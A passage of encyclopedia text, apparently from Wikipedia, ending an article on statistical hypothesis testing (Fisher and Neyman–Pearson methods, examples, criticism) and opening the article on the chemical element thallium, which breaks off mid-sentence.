Student's t distribution with known degrees of freedom, or a normal distribution with known mean and variance. Select a significance level (α), the maximum acceptable false positive rate. Common values are 5% and 1%. Compute from the observations the observed value tobs of the test statistic T. Decide to either reject the null hypothesis in favor of the alternative or not reject it. The Neyman-Pearson decision rule is to reject the null hypothesis H0 if the observed value tobs is in the critical region, and not to reject the null hypothesis otherwise. Practical example The difference in the two processes applied to the radioactive suitcase example (below): "The Geiger-counter reading is 10. The limit is 9. Check the suitcase." "The Geiger-counter reading is high; 97% of safe suitcases have lower readings. The limit is 95%. Check the suitcase." The former report is adequate, the latter gives a more detailed explanation of the data and the reason why the suitcase is being checked. Not rejecting the null hypothesis does not mean the null hypothesis is "accepted" per se (though Neyman and Pearson used that word in their original writings; see the Interpretation section). The processes described here are perfectly adequate for computation. They seriously neglect the design of experiments considerations. It is particularly critical that appropriate sample sizes be estimated before conducting the experiment. The phrase "test of significance" was coined by statistician Ronald Fisher. Interpretation When the null hypothesis is true and statistical assumptions are met, the probability that the p-value will be less than or equal to the significance level is at most . This ensures that the hypothesis test maintains its specified false positive rate (provided that statistical assumptions are met). The p-value is the probability that a test statistic which is at least as extreme as the one obtained would occur under the null hypothesis. At a significance level of 0.05, a fair coin would be expected to (incorrectly) reject the null hypothesis (that it is fair) in 1 out of 20 tests on average. The p-value does not provide the probability that either the null hypothesis or its opposite is correct (a common source of confusion). If the p-value is less than the chosen significance threshold (equivalently, if the observed test statistic is in the critical region), then we say the null hypothesis is rejected at the chosen level of significance. If the p-value is not less than the chosen significance threshold (equivalently, if the observed test statistic is outside the critical region), then the null hypothesis is not rejected at the chosen level of significance. In the "lady tasting tea" example (below), Fisher required the lady to properly categorize all of the cups of tea to justify the conclusion that the result was unlikely to result from chance. His test revealed that if the lady was effectively guessing at random (the null hypothesis), there was a 1.4% chance that the observed results (perfectly ordered tea) would occur. Use and importance Statistics are helpful in analyzing most collections of data. This is equally true of hypothesis testing which can justify conclusions even when no scientific theory exists. In the Lady tasting tea example, it was "obvious" that no difference existed between (milk poured into tea) and (tea poured into milk). The data contradicted the "obvious". Real world applications of hypothesis testing include: Testing whether more men than women suffer from nightmares Establishing authorship of documents Evaluating the effect of the full moon on behavior Determining the range at which a bat can detect an insect by echo Deciding whether hospital carpeting results in more infections Selecting the best means to stop smoking Checking whether bumper stickers reflect car owner behavior Testing the claims of handwriting analysts Statistical hypothesis testing plays an important role in the whole of statistics and in statistical inference. For example, Lehmann (1992) in a review of the fundamental paper by Neyman and Pearson (1933) says: "Nevertheless, despite their shortcomings, the new paradigm formulated in the 1933 paper, and the many developments carried out within its framework continue to play a central role in both the theory and practice of statistics and can be expected to do so in the foreseeable future". Significance testing has been the favored statistical tool in some experimental social sciences (over 90% of articles in the Journal of Applied Psychology during the early 1990s). Other fields have favored the estimation of parameters (e.g. effect size). Significance testing is used as a substitute for the traditional comparison of predicted value and experimental result at the core of the scientific method. When theory is only capable of predicting the sign of a relationship, a directional (one-sided) hypothesis test can be configured so that only a statistically significant result supports theory. This form of theory appraisal is the most heavily criticized application of hypothesis testing. Cautions "If the government required statistical procedures to carry warning labels like those on drugs, most inference methods would have long labels indeed." This caution applies to hypothesis tests and alternatives to them. The successful hypothesis test is associated with a probability and a type-I error rate. The conclusion might be wrong. The conclusion of the test is only as solid as the sample upon which it is based. The design of the experiment is critical. A number of unexpected effects have been observed including: The clever Hans effect. A horse appeared to be capable of doing simple arithmetic. The Hawthorne effect. Industrial workers were more productive in better illumination, and most productive in worse. The placebo effect. Pills with no medically active ingredients were remarkably effective. A statistical analysis of misleading data produces misleading conclusions. The issue of data quality can be more subtle. In forecasting for example, there is no agreement on a measure of forecast accuracy. In the absence of a consensus measurement, no decision based on measurements will be without controversy. Publication bias: Statistically nonsignificant results may be less likely to be published, which can bias the literature. Multiple testing: When multiple true null hypothesis tests are conducted at once without adjustment, the overall probability of Type I error is higher than the nominal alpha level. Those making critical decisions based on the results of a hypothesis test are prudent to look at the details rather than the conclusion alone. In the physical sciences most results are fully accepted only when independently confirmed. The general advice concerning statistics is, "Figures never lie, but liars figure" (anonymous). Definition of terms The following definitions are mainly based on the exposition in the book by Lehmann and Romano: Statistical hypothesis: A statement about the parameters describing a population (not a sample). Test statistic: A value calculated from a sample without any unknown parameters, often to summarize the sample for comparison purposes. : Any hypothesis which specifies the population distribution completely. Composite hypothesis: Any hypothesis which does not specify the population distribution completely. Null hypothesis (H0) Positive data: Data that enable the investigator to reject a null hypothesis. Alternative hypothesis (H1) s of a statistical test are the boundaries of the acceptance region of the test. The acceptance region is the set of values of the test statistic for which the null hypothesis is not rejected. Depending on the shape of the acceptance region, there can be one or more than one critical value. / : The set of values of the test statistic for which the null hypothesis is rejected. Power of a test (1 − β) Size: For simple hypotheses, this is the test's probability of incorrectly rejecting the null hypothesis. The false positive rate. For composite hypotheses this is the supremum of the probability of rejecting the null hypothesis over all cases covered by the null hypothesis. The complement of the false positive rate is termed specificity in biostatistics. ("This is a specific test. Because the result is positive, we can confidently say that the patient has the condition.") See sensitivity and specificity and type I and type II errors for exhaustive definitions. Significance level of a test (α) p-value : A predecessor to the statistical hypothesis test (see the Origins section). An experimental result was said to be statistically significant if a sample was sufficiently inconsistent with the (null) hypothesis. This was variously considered common sense, a pragmatic heuristic for identifying meaningful experimental results, a convention establishing a threshold of statistical evidence or a method for drawing conclusions from data. The statistical hypothesis test added mathematical rigor and philosophical consistency to the concept by making the alternative hypothesis explicit. The term is loosely used for the modern version which is now part of statistical hypothesis testing. Conservative test: A test is conservative if, when constructed for a given nominal significance level, the true probability of incorrectly rejecting the null hypothesis is never greater than the nominal level. Exact test A statistical hypothesis test compares a test statistic (z or t for examples) to a threshold. The test statistic (the formula found in the table below) is based on optimality. For a fixed level of Type I error rate, use of these statistics minimizes Type II error rates (equivalent to maximizing power). The following terms describe tests in terms of such optimality: Most powerful test: For a given size or significance level, the test with the greatest power (probability of rejection) for a given value of the parameter(s) being tested, contained in the alternative hypothesis. Uniformly most powerful test (UMP) Nonparametric bootstrap hypothesis testing Bootstrap-based resampling methods can be used for null hypothesis testing. A bootstrap creates numerous simulated samples by randomly resampling (with replacement) the original, combined sample data, assuming the null hypothesis is correct. The bootstrap is very versatile as it is distribution-free and it does not rely on restrictive parametric assumptions, but rather on empirical approximate methods with asymptotic guarantees. Traditional parametric hypothesis tests are more computationally efficient but make stronger structural assumptions. In situations where computing the probability of the test statistic under the null hypothesis is hard or impossible (due to perhaps inconvenience or lack of knowledge of the underlying distribution), the bootstrap offers a viable method for statistical inference. Examples Human sex ratio The earliest use of statistical hypothesis testing is generally credited to the question of whether male and female births are equally likely (null hypothesis), which was addressed in the 1700s by John Arbuthnot (1710), and later by Pierre-Simon Laplace (1770s). Arbuthnot examined birth records in London for each of the 82 years from 1629 to 1710, and applied the sign test, a simple non-parametric test. In every year, the number of males born in London exceeded the number of females. Considering more male or more female births as equally likely, the probability of the observed outcome is 0.582, or about 1 in 4,836,000,000,000,000,000,000,000; in modern terms, this is the p-value. Arbuthnot concluded that this is too small to be due to chance and must instead be due to divine providence: "From whence it follows, that it is Art, not Chance, that governs." In modern terms, he rejected the null hypothesis of equally likely male and female births at the p = 1/282 significance level. Laplace considered the statistics of almost half a million births. The statistics showed an excess of boys compared to girls. He concluded by calculation of a p-value that the excess was a real, but unexplained, effect. Lady tasting tea In a famous example of hypothesis testing, known as the Lady tasting tea, Dr. Muriel Bristol, a colleague of Fisher, claimed to be able to tell whether the tea or the milk was added first to a cup. Fisher proposed to give her eight cups, four of each variety, in random order. One could then ask what the probability was for her getting the number she got correct, but just by chance. The null hypothesis was that the Lady had no such ability. The test statistic was a simple count of the number of successes in selecting the 4 cups. The critical region was the single case of 4 successes of 4 possible based on a conventional probability criterion (< 5%). A pattern of 4 successes corresponds to 1 out of 70 possible combinations (p≈ 1.4%). Fisher asserted that no alternative hypothesis was (ever) required. The lady correctly identified every cup, which would be considered a statistically significant result. Courtroom trial A statistical test procedure is comparable to a criminal trial; a defendant is considered not guilty as long as his or her guilt is not proven. The prosecutor tries to prove the guilt of the defendant. Only when there is enough evidence for the prosecution is the defendant convicted. In the start of the procedure, there are two hypotheses : "the defendant is not guilty", and : "the defendant is guilty". The first one, , is called the null hypothesis. The second one, , is called the alternative hypothesis. It is the alternative hypothesis that one hopes to support. The hypothesis of innocence is rejected only when an error is very unlikely, because one does not want to convict an innocent defendant. Such an error is called error of the first kind (i.e., the conviction of an innocent person), and the occurrence of this error is controlled to be rare. As a consequence of this asymmetric behaviour, an error of the second kind (acquitting a person who committed the crime), is more common. A criminal trial can be regarded as either or both of two decision processes: guilty vs not guilty or evidence vs a threshold ("beyond a reasonable doubt"). In one view, the defendant is judged; in the other view the performance of the prosecution (which bears the burden of proof) is judged. A hypothesis test can be regarded as either a judgment of a hypothesis or as a judgment of evidence. Philosopher's beans The following example was produced by a philosopher describing scientific methods generations before hypothesis testing was formalized and popularized. Few beans of this handful are white. Most beans in this bag are white. Therefore: Probably, these beans were taken from another bag. This is an hypothetical inference. The beans in the bag are the population. The handful are the sample. The null hypothesis is that the sample originated from the population. The criterion for rejecting the null-hypothesis is the "obvious" difference in appearance (an informal difference in the mean). The interesting result is that consideration of a real population and a real sample produced an imaginary bag. The philosopher was considering logic rather than probability. To be a real statistical hypothesis test, this example requires the formalities of a probability calculation and a comparison of that probability to a standard. A simple generalization of the example considers a mixed bag of beans and a handful that contain either very few or very many white beans. The generalization considers both extremes. It requires more calculations and more comparisons to arrive at a formal answer, but the core philosophy is unchanged; If the composition of the handful is greatly different from that of the bag, then the sample probably originated from another bag. The original example is termed a one-sided or a one-tailed test while the generalization is termed a two-sided or two-tailed test. The statement also relies on the inference that the sampling was random. If someone had been picking through the bag to find white beans, then it would explain why the handful had so many white beans, and also explain why the number of white beans in the bag was depleted (although the bag is probably intended to be assumed much larger than one's hand). Clairvoyant card game A person (the subject) is tested for clairvoyance. They are shown the back face of a randomly chosen playing card 25 times and asked which of the four suits it belongs to. The number of hits, or correct answers, is called X. As we try to find evidence of their clairvoyance, for the time being the null hypothesis is that the person is not clairvoyant. The alternative is: the person is (more or less) clairvoyant. If the null hypothesis is valid, the only thing the test person can do is guess. For every card, the probability (relative frequency) of any single suit appearing is 1/4. If the alternative is valid, the test subject will predict the suit correctly with probability greater than 1/4. We will call the probability of guessing correctly p. The hypotheses, then, are: null hypothesis     (just guessing) and alternative hypothesis    (true clairvoyant). When the test subject correctly predicts all 25 cards, we will consider them clairvoyant, and reject the null hypothesis. Thus also with 24 or 23 hits. With only 5 or 6 hits, on the other hand, there is no cause to consider them so. But what about 12 hits, or 17 hits? What is the critical number, c, of hits, at which point we consider the subject to be clairvoyant? How do we determine the critical value c? With the choice c=25 (i.e. we only accept clairvoyance when all cards are predicted correctly) we're more critical than with c=10. In the first case almost no test subjects will be recognized to be clairvoyant, in the second case, a certain number will pass the test. In practice, one decides how critical one will be. That is, one decides how often one accepts an error of the first kind – a false positive, or Type I error. With c = 25 the probability of such an error is: and hence, very small. The probability of a false positive is the probability of randomly guessing correctly all 25 times. Being less critical, with c = 10, gives: Thus, c = 10 yields a much greater probability of false positive. Before the test is actually performed, the maximum acceptable probability of a Type I error (α) is determined. Typically, values in the range of 1% to 5% are selected. (If the maximum acceptable error rate is zero, an infinite number of correct guesses is required.) Depending on this Type 1 error rate, the critical value c is calculated. For example, if we select an error rate of 1%, c is calculated thus: From all the numbers c, with this property, we choose the smallest, in order to minimize the probability of a Type II error, a false negative. For the above example, we select: . Variations and sub-classes Statistical hypothesis testing is a key technique of both frequentist inference and Bayesian inference, although the two types of inference have notable differences. Statistical hypothesis tests define a procedure that controls (fixes) the probability of incorrectly deciding that a default position (null hypothesis) is incorrect. The procedure is based on how likely it would be for a set of observations to occur if the null hypothesis were true. This probability of making an incorrect decision is not the probability that the null hypothesis is true, nor whether any specific alternative hypothesis is true. This contrasts with other possible techniques of decision theory in which the null and alternative hypothesis are treated on a more equal basis. One naïve Bayesian approach to hypothesis testing is to base decisions on the posterior probability, but this fails when comparing point and continuous hypotheses. Other approaches to decision making, such as Bayesian decision theory, attempt to balance the consequences of incorrect decisions across all possibilities, rather than concentrating on a single null hypothesis. A number of other approaches to reaching a decision based on data are available via decision theory and optimal decisions, some of which have desirable properties. Hypothesis testing, though, is a dominant approach to data analysis in many fields of science. Extensions to the theory of hypothesis testing include the study of the power of tests, i.e. the probability of correctly rejecting the null hypothesis given that it is false. Such considerations can be used for the purpose of sample size determination prior to the collection of data. Neyman–Pearson hypothesis testing An example of Neyman–Pearson hypothesis testing (or null hypothesis statistical significance testing) can be made by a change to the radioactive suitcase example. If the "suitcase" is actually a shielded container for the transportation of radioactive material, then a test might be used to select among three hypotheses: no radioactive source present, one present, two (all) present. The test could be required for safety, with actions required in each case. The Neyman–Pearson lemma of hypothesis testing says that a good criterion for the selection of hypotheses is the ratio of their probabilities (a likelihood ratio). A simple method of solution is to select the hypothesis with the highest probability for the Geiger counts observed. The typical result matches intuition: few counts imply no source, many counts imply two sources and intermediate counts imply one source. Notice also that usually there are problems for proving a negative. Null hypotheses should be at least falsifiable. Neyman–Pearson theory can accommodate both prior probabilities and the costs of actions resulting from decisions. The former allows each test to consider the results of earlier tests (unlike Fisher's significance tests). The latter allows the consideration of economic issues (for example) as well as probabilities. A likelihood ratio remains a good criterion for selecting among hypotheses. The two forms of hypothesis testing are based on different problem formulations. The original test is analogous to a true/false question; the Neyman–Pearson test is more like multiple choice. In the view of Tukey the former produces a conclusion on the basis of only strong evidence while the latter produces a decision on the basis of available evidence. While the two tests seem quite different both mathematically and philosophically, later developments lead to the opposite claim. Consider many tiny radioactive sources. The hypotheses become 0,1,2,3... grains of radioactive sand. There is little distinction between none or some radiation (Fisher) and 0 grains of radioactive sand versus all of the alternatives (Neyman–Pearson). The major Neyman–Pearson paper of 1933 also considered composite hypotheses (ones whose distribution includes an unknown parameter). An example proved the optimality of the (Student's) t-test, "there can be no better test for the hypothesis under consideration" (p 321). Neyman–Pearson theory was proving the optimality of Fisherian methods from its inception. Fisher's significance testing has proven a popular flexible statistical tool in application with little mathematical growth potential. Neyman–Pearson hypothesis testing is claimed as a pillar of mathematical statistics, creating a new paradigm for the field. It also stimulated new applications in statistical process control, detection theory, decision theory and game theory. Both formulations have been successful, but the successes have been of a different character. The dispute over formulations is unresolved. Science primarily uses Fisher's (slightly modified) formulation as taught in introductory statistics. Statisticians study Neyman–Pearson theory in graduate school. Mathematicians are proud of uniting the formulations. Philosophers consider them separately. Learned opinions deem the formulations variously competitive (Fisher vs Neyman), incompatible or complementary. The dispute has become more complex since Bayesian inference has achieved respectability. The terminology is inconsistent. Hypothesis testing can mean any mixture of two formulations that both changed with time. Any discussion of significance testing vs hypothesis testing is doubly vulnerable to confusion. Fisher thought that hypothesis testing was a useful strategy for performing industrial quality control, however, he strongly disagreed that hypothesis testing could be useful for scientists. Hypothesis testing provides a means of finding test statistics used in significance testing. The concept of power is useful in explaining the consequences of adjusting the significance level and is heavily used in sample size determination. The two methods remain philosophically distinct. They usually (but not always) produce the same mathematical answer. The preferred answer is context dependent. While the existing merger of Fisher and Neyman–Pearson theories has been heavily criticized, modifying the merger to achieve Bayesian goals has been considered. Criticism Criticism of statistical hypothesis testing fills volumes. Much of the criticism can be summarized by the following issues: The interpretation of a p-value is dependent upon stopping rule and definition of multiple comparison. The former often changes during the course of a study and the latter is unavoidably ambiguous. (i.e. "p values depend on both the (data) observed and on the other possible (data) that might have been observed but weren't"). Confusion resulting (in part) from combining the methods of Fisher and Neyman–Pearson which are conceptually distinct. Emphasis on statistical significance to the exclusion of estimation and confirmation by repeated experiments. Rigidly requiring statistical significance as a criterion for publication, resulting in publication bias. Most of the criticism is indirect. Rather than being wrong, statistical hypothesis testing is misunderstood, overused and misused. When used to detect whether a difference exists between groups, a paradox arises. As improvements are made to experimental design (e.g. increased precision of measurement and sample size), the test becomes more lenient. Unless one accepts the absurd assumption that all sources of noise in the data cancel out completely, the chance of finding statistical significance in either direction approaches 100%. However, this absurd assumption that the mean difference between two groups cannot be zero implies that the data cannot be independent and identically distributed (i.i.d.) because the expected difference between any two subgroups of i.i.d. random variates is zero; therefore, the i.i.d. assumption is also absurd. Layers of philosophical concerns. The probability of statistical significance is a function of decisions made by experimenters/analysts. If the decisions are based on convention they are termed arbitrary or mindless while those not so based may be termed subjective. To minimize type II errors, large samples are recommended. In psychology practically all null hypotheses are claimed to be false for sufficiently large samples so "...it is usually nonsensical to perform an experiment with the sole aim of rejecting the null hypothesis." "Statistically significant findings are often misleading" in psychology. Statistical significance does not imply practical significance, and correlation does not imply causation. Casting doubt on the null hypothesis is thus far from directly supporting the research hypothesis. "[I]t does not tell us what we want to know". Lists of dozens of complaints are available. Critics and supporters are largely in factual agreement regarding the characteristics of null hypothesis significance testing (NHST): While it can provide critical information, it is inadequate as the sole tool for statistical analysis. Successfully rejecting the null hypothesis may offer no support for the research hypothesis. The continuing controversy concerns the selection of the best statistical practices for the near-term future given the existing practices. However, adequate research design can minimize this issue. Critics would prefer to ban NHST completely, forcing a complete departure from those practices, while supporters suggest a less absolute change. Controversy over significance testing, and its effects on publication bias in particular, has produced several results. The American Psychological Association has strengthened its statistical reporting requirements after review, medical journal publishers have recognized the obligation to publish some results that are not statistically significant to combat publication bias, and a journal (Journal of Articles in Support of the Null Hypothesis) has been created to publish such results exclusively. Textbooks have added some cautions, and increased coverage of the tools necessary to estimate the size of the sample required to produce significant results. Few major organizations have abandoned use of significance tests although some have discussed doing so. For instance, in 2023, the editors of the Journal of Physiology "strongly recommend the use of estimation methods for those publishing in The Journal" (meaning the magnitude of the effect size (to allow readers to judge whether a finding has practical, physiological, or clinical relevance) and confidence intervals to convey the precision of that estimate), saying "Ultimately, it is the physiological importance of the data that those publishing in The Journal of Physiology should be most concerned with, rather than the statistical significance." Alternatives A unifying position of critics is that statistics should not lead to an accept-reject conclusion or decision, but to an estimated value with an interval estimate; this data-analysis philosophy is broadly referred to as estimation statistics. Estimation statistics can be accomplished with either frequentist or Bayesian methods. Critics of significance testing have advocated basing inference less on p-values and more on confidence intervals for effect sizes for importance, prediction intervals for confidence, replications and extensions for replicability, meta-analyses for generality :. But none of these suggested alternatives inherently produces a decision. Lehmann said that hypothesis testing theory can be presented in terms of conclusions/decisions, probabilities, or confidence intervals: "The distinction between the ... approaches is largely one of reporting and interpretation." Bayesian inference is one proposed alternative to significance testing. (Nickerson cited 10 sources suggesting it, including Rozeboom (1960)). For example, Bayesian parameter estimation can provide rich information about the data from which researchers can draw inferences, while using uncertain priors that exert only minimal influence on the results when enough data is available. Psychologist John K. Kruschke has suggested Bayesian estimation as an alternative for the t-test and has also contrasted Bayesian estimation for assessing null values with Bayesian model comparison for hypothesis testing. Two competing models/hypotheses can be compared using Bayes factors. Bayesian methods could be criticized for requiring information that is seldom available in the cases where significance testing is most heavily used. Neither the prior probabilities nor the probability distribution of the test statistic under the alternative hypothesis are often available in the social sciences. Advocates of a Bayesian approach sometimes claim that the goal of a researcher is most often to objectively assess the probability that a hypothesis is true based on the data they have collected. Neither Fisher's significance testing, nor Neyman–Pearson hypothesis testing can provide this information, and do not claim to. The probability a hypothesis is true can only be derived from use of Bayes' Theorem, which was unsatisfactory to both the Fisher and Neyman–Pearson camps due to the explicit use of subjectivity in the form of the prior probability. Fisher's strategy is to sidestep this with the p-value (an objective index based on the data alone) followed by inductive inference, while Neyman–Pearson devised their approach of inductive behaviour.
Mathematics
Statistics and probability
null
30309
https://en.wikipedia.org/wiki/Thallium
Thallium
Thallium is a chemical element; it has symbol Tl and atomic number 81. It is a silvery-white post-transition metal that is not found free in nature. When isolated, thallium resembles tin, but discolors when exposed to air. Chemists William Crookes and Claude-Auguste Lamy discovered thallium independently in 1861, in residues of sulfuric acid production. Both used the newly developed method of flame spectroscopy, in which thallium produces a notable green spectral line. Thallium, from Greek , , meaning "green shoot" or "twig", was named by Crookes. It was isolated by both Lamy and Crookes in 1862; Lamy by electrolysis and Crookes by precipitation and melting of the resultant powder. Crookes exhibited it as a powder precipitated by zinc at the international exhibition, which opened on 1 May that year. Thallium tends to form the +3 and +1 oxidation states. The +3 state resembles that of the other elements in group 13 (boron, aluminium, gallium, indium). However, the +1 state, which is far more prominent in thallium than the elements above it, recalls the chemistry of alkali metals and thallium(I) ions are found geologically mostly in potassium-based ores and (when ingested) are handled in many ways like potassium ions (K+) by ion pumps in living cells. Commercially, thallium is produced not from potassium ores, but as a byproduct from refining of heavy-metal sulfide ores. Approximately 65% of thallium production is used in the electronics industry and the remainder is used in the pharmaceutical industry and in glass manufacturing. It is also used in infrared detectors. The radioisotope thallium-201 (as the soluble chloride TlCl) is used in small amounts as an agent in a nuclear medicine scan, during one type of nuclear cardiac stress test. Soluble thallium salts (many of which are nearly tasteless) are highly toxic and they were historically used in rat poisons and insecticides. Because of their nonselective toxicity, use of these compounds has been restricted or banned in many countries. Thallium poisoning usually results in hair loss. Because of its historic popularity as a murder weapon, thallium has gained notoriety as "the poisoner's poison" and "inheritance powder" (alongside arsenic). Characteristics A thallium atom has 81 electrons, arranged in the electron configuration [Xe]4f145d106s26p1; of these, the three outermost electrons in the sixth shell are valence electrons. Due to the inert pair effect, the 6s electron pair is relativistically stabilised and it is more difficult to get these involved in chemical bonding than it is for the heavier elements. Thus, very few electrons are available for metallic bonding, similar to the neighboring elements mercury and lead. Thallium, then, like its congeners, is a soft, highly electrically conducting metal with a low melting point, of 304 °C. A number of standard electrode potentials, depending on the reaction under study, are reported for thallium, reflecting the greatly decreased stability of the +3 oxidation state: Thallium is the first element in group 13 where the reduction of the +3 oxidation state to the +1 oxidation state is spontaneous under standard conditions. Since bond energies decrease down the group, with thallium, the energy released in forming two additional bonds and attaining the +3 state is not always enough to outweigh the energy needed to involve the 6s-electrons. Accordingly, thallium(I) oxide and hydroxide are more basic and thallium(III) oxide and hydroxide are more acidic, showing that thallium conforms to the general rule of elements being more electropositive in their lower oxidation states. Thallium is malleable and sectile enough to be cut with a knife at room temperature. It has a metallic luster that, when exposed to air, quickly tarnishes to a bluish-gray tinge, resembling lead. It may be preserved by immersion in oil. A heavy layer of oxide builds up on thallium if left in air. In the presence of water, thallium hydroxide is formed. Sulfuric and nitric acids dissolve thallium rapidly to make the sulfate and nitrate salts, while hydrochloric acid forms an insoluble thallium(I) chloride layer. Isotopes Thallium has 41 isotopes which have atomic masses that range from 176 to 216. 203Tl and 205Tl are the only stable isotopes and make up nearly all of natural thallium. The five short-lived isotopes 206Tl through 210Tl inclusive occur in nature, as they are part of the natural decay chains of heavier elements. 204Tl is the most stable radioisotope, with a half-life of 3.78 years. It is made by the neutron activation of stable thallium in a nuclear reactor. The most useful radioisotope, 201Tl (half-life 73 hours), decays by electron capture, emitting X-rays (~70–80 keV), and photons of 135 and 167 keV in 10% total abundance; therefore, it has good imaging characteristics without an excessive patient-radiation dose. It is the most popular isotope used for thallium nuclear cardiac stress tests. Compounds Thallium(III) Thallium(III) compounds resemble the corresponding aluminium(III) compounds. They are moderately strong oxidizing agents and are usually unstable, as illustrated by the positive reduction potential for the Tl3+/Tl couple. Some mixed-valence compounds are also known, such as Tl4O3 and TlCl2, which contain both thallium(I) and thallium(III). Thallium(III) oxide, Tl2O3, is a black solid which decomposes above 800 °C, forming the thallium(I) oxide and oxygen. The simplest possible thallium compound, thallane (TlH3), is too unstable to exist in bulk, both due to the instability of the +3 oxidation state as well as poor overlap of the valence 6s and 6p orbitals of thallium with the 1s orbital of hydrogen. The trihalides are more stable, although they are chemically distinct from those of the lighter group 13 elements and are still the least stable in the whole group. For instance, thallium(III) fluoride, TlF3, has the β-BiF3 structure rather than that of the lighter group 13 trifluorides, and does not form the complex anion in aqueous solution. The trichloride and tribromide disproportionate just above room temperature to give the monohalides, and thallium triiodide contains the linear triiodide anion () and is actually a thallium(I) compound. Thallium(III) sesquichalcogenides do not exist. Thallium(I) The thallium(I) halides are stable. In keeping with the large size of the Tl+ cation, the chloride and bromide have the caesium chloride structure, while the fluoride and iodide have distorted sodium chloride structures. Like the analogous silver compounds, TlCl, TlBr, and TlI are photosensitive and display poor solubility in water. The stability of thallium(I) compounds demonstrates its differences from the rest of the group: a stable oxide, hydroxide, and carbonate are known, as are many chalcogenides. The double salt has been shown to have hydroxyl-centred triangles of thallium, , as a recurring motif throughout its solid structure. The metalorganic compound thallium ethoxide (TlOEt, TlOC2H5) is a heavy liquid (ρ , m.p. −3 °C), often used as a basic and soluble thallium source in organic and organometallic chemistry. Organothallium compounds Organothallium compounds tend to be thermally unstable, in concordance with the trend of decreasing thermal stability down group 13. The chemical reactivity of the Tl–C bond is also the lowest in the group, especially for ionic compounds of the type R2TlX. Thallium forms the stable [Tl(CH3)2]+ ion in aqueous solution; like the isoelectronic Hg(CH3)2 and [Pb(CH3)2]2+, it is linear. Trimethylthallium and triethylthallium are, like the corresponding gallium and indium compounds, flammable liquids with low melting points. Like indium, thallium cyclopentadienyl compounds contain thallium(I), in contrast to gallium(III). History Thallium (Greek , , meaning "a green shoot or twig") was discovered by William Crookes and Claude Auguste Lamy, working independently, both using flame spectroscopy (Crookes was first to publish his findings, on March 30, 1861). The name comes from thallium's bright green spectral emission lines derived from the Greek 'thallos', meaning a green twig. After the publication of the improved method of flame spectroscopy by Robert Bunsen and Gustav Kirchhoff and the discovery of caesium and rubidium in the years 1859 to 1860, flame spectroscopy became an approved method to determine the composition of minerals and chemical products. Crookes and Lamy both started to use the new method. Crookes used it to make spectroscopic determinations for tellurium on selenium compounds deposited in the lead chamber of a sulfuric acid production plant near Tilkerode in the Harz mountains. He had obtained the samples for his research on selenium cyanide from August Hofmann years earlier. By 1862, Crookes was able to isolate small quantities of the new element and determine the properties of a few compounds. Claude-Auguste Lamy used a spectrometer that was similar to Crookes' to determine the composition of a selenium-containing substance which was deposited during the production of sulfuric acid from pyrite. He also noticed the new green line in the spectra and concluded that a new element was present. Lamy had received this material from the sulfuric acid plant of his friend Frédéric Kuhlmann and this by-product was available in large quantities. Lamy started to isolate the new element from that source. The fact that Lamy was able to work ample quantities of thallium enabled him to determine the properties of several compounds and in addition he prepared a small ingot of metallic thallium which he prepared by remelting thallium he had obtained by electrolysis of thallium salts. As both scientists discovered thallium independently and a large part of the work, especially the isolation of the metallic thallium was done by Lamy, Crookes tried to secure his own priority on the work. Lamy was awarded a medal at the International Exhibition in London 1862: For the discovery of a new and abundant source of thallium and after heavy protest Crookes also received a medal: thallium, for the discovery of the new element. The controversy between both scientists continued through 1862 and 1863. Most of the discussion ended after Crookes was elected Fellow of the Royal Society in June 1863. The dominant use of thallium was the use as poison for rodents. After several accidents the use as poison was banned in the United States by Presidential Executive Order 11643 in February 1972. In subsequent years several other countries also banned its use. Occurrence and production Thallium concentration in the Earth's crust is estimated to be 0.7 mg/kg, mostly in association with potassium-based minerals in clays, soils, and granites. The major source of thallium for practical purposes is the trace amount that is found in copper, lead, zinc, and other heavy-metal-sulfide ores. Thallium is found in the minerals crookesite TlCu7Se4, hutchinsonite TlPbAs5S9, and lorándite TlAsS2. Thallium also occurs as a trace element in iron pyrite, and thallium is extracted as a by-product of roasting this mineral for the production of sulfuric acid. Thallium can also be obtained from the smelting of lead and zinc ores. Manganese nodules found on the ocean floor contain some thallium. In addition, several other thallium minerals, containing 16% to 60% thallium, occur in nature as complexes of sulfides or selenides that primarily contain antimony, arsenic, copper, lead, and silver. These minerals are rare, and have had no commercial importance as sources of thallium. The Allchar deposit in southern North Macedonia was the only area where thallium was actively mined. This deposit still contains an estimated 500 tonnes of thallium, and it is a source for several rare thallium minerals, for example lorándite. The United States Geological Survey (USGS) estimates that the annual worldwide production of thallium is 10 metric tonnes as a by-product from the smelting of copper, zinc, and lead ores. Thallium is either extracted from the dusts from the smelter flues or from residues such as slag that are collected at the end of the smelting process. The raw materials used for thallium production contain large amounts of other materials and therefore a purification is the first step. The thallium is leached either by the use of an alkali or sulfuric acid from the material. The thallium is precipitated several times from the solution to remove impurities. At the end it is converted to thallium sulfate and the thallium is extracted by electrolysis on platinum or stainless steel plates. The production of thallium decreased by about 33% in the period from 1995 to 2009 – from about 15 metric tonnes to about 10 tonnes. Since there are several small deposits or ores with relatively high thallium content, it would be possible to increase the production if a new application, such as a thallium-containing high-temperature superconductor, becomes practical for widespread use outside of the laboratory. Applications Historic uses The odorless and tasteless thallium sulfate was once widely used as rat poison and ant killer. Since 1972 this use has been prohibited in the United States due to safety concerns. Many other countries followed this example. Thallium salts were used in the treatment of ringworm, other skin infections and to reduce the night sweating of tuberculosis patients. This use has been limited due to their narrow therapeutic index, and the development of improved medicines for these conditions. Optics Thallium(I) bromide and thallium(I) iodide crystals have been used as infrared optical materials, because they are harder than other common infrared optics, and because they have transmission at significantly longer wavelengths. The trade name KRS-5 refers to this material. Thallium(I) oxide has been used to manufacture glasses that have a high index of refraction. Combined with sulfur or selenium and arsenic, thallium has been used in the production of high-density glasses that have low melting points in the range of 125 and 150 Celsius°. These glasses have room-temperature properties that are similar to ordinary glasses and are durable, insoluble in water and have unique refractive indices. Electronics Thallium(I) sulfide's electrical conductivity changes with exposure to infrared light, making this compound useful in photoresistors. Thallium selenide has been used in bolometers for infrared detection. Doping selenium semiconductors with thallium improves their performance, thus it is used in trace amounts in selenium rectifiers. Another application of thallium doping is the sodium iodide and cesium iodide crystals in gamma radiation detection devices. In these, the sodium iodide crystals are doped with a small amount of thallium to improve their efficiency as scintillation generators. Some of the electrodes in dissolved oxygen analyzers contain thallium. High-temperature superconductivity Research activity with thallium is ongoing to develop high-temperature superconducting materials for such applications as magnetic resonance imaging, storage of magnetic energy, magnetic propulsion, and electric power generation and transmission. The research in applications started after the discovery of the first thallium barium calcium copper oxide superconductor in 1988. Thallium cuprate superconductors have been discovered that have transition temperatures above 120 K. Some 